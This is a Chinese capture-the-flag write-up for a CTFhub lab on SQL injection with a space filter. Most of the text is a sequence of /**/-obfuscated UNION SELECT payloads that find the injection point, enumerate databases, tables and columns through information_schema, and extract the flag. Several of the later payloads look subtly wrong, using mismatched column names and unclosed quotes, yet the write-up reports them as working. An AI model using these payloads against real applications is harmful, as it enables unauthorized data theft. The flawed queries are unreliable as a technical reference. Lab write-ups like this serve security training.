CTFhub-sql注入-绕过空格过滤

CTFhub-sql注入-绕过空格过滤_第1张图片

 

常用绕过空格过滤的方法:

/**/、()、%0a

1.判断是否存在sqli注入

1

CTFhub-sql注入-绕过空格过滤_第2张图片

1/**/union/**/select/**/1=1

1/**/union/**/select/**/1=2

如果1/**/union/**/select/**/1=1的显示结果与1/**/union/**/select/**/1=2的显示结果不一样,

与1的结果一样说明存在注入点

 2

CTFhub-sql注入-绕过空格过滤_第3张图片

 3 没有回显,说明只用 1,2 这两个

 1/**/union/**/select/**/1,2     没有将数据带出来

CTFhub-sql注入-绕过空格过滤_第4张图片

修改最前面的注入点:为 -1 等其他数字

-1/**/union/**/select/**/1,2

CTFhub-sql注入-绕过空格过滤_第5张图片

-1/**/union/**/select/**/1,version()   

查看数据库版本:10.3.22-MariaDB-0+deb10u1

CTFhub-sql注入-绕过空格过滤_第6张图片

 -1/**/union/**/select/**/1,database()   

报出当前数据库:sqli

CTFhub-sql注入-绕过空格过滤_第7张图片

 -1/**/union/**/select/**/1,group_concat(schema_name)/**/

from/**/information_schema.schemata

报出所有的数据库:information_schema,mysql,performance_schema,sqli

CTFhub-sql注入-绕过空格过滤_第8张图片

-1/**/union/**/select/**/1,group_concat(table_name)/**/

from/**/information_schema.tables/**/

where/**/schema_name='sqli

报数据库 sqli 中  表名:news,beskggkoxn

CTFhub-sql注入-绕过空格过滤_第9张图片

 -1/**/union/**/select/**/1,group_concat(column_name)/**/

from/**/information_schema.columns/**/

where/**/schema_table='beskggkoxn

通过表名:beskggkoxn     报字段名:dzkctujmtaCTFhub-sql注入-绕过空格过滤_第10张图片

 -1/**/union/**/select/**/1,group_concat(dzkctujmta)/**/

from/**/sqli.beskggkoxn

通过数据库sqli中 数据表beskggkoxn 中的字段名dzkctujmta字段内容:ctfhub{b8947534164e94454cade1e1}

CTFhub-sql注入-绕过空格过滤_第11张图片

你可能感兴趣的:(CTF--SQL注入,sql,数据库)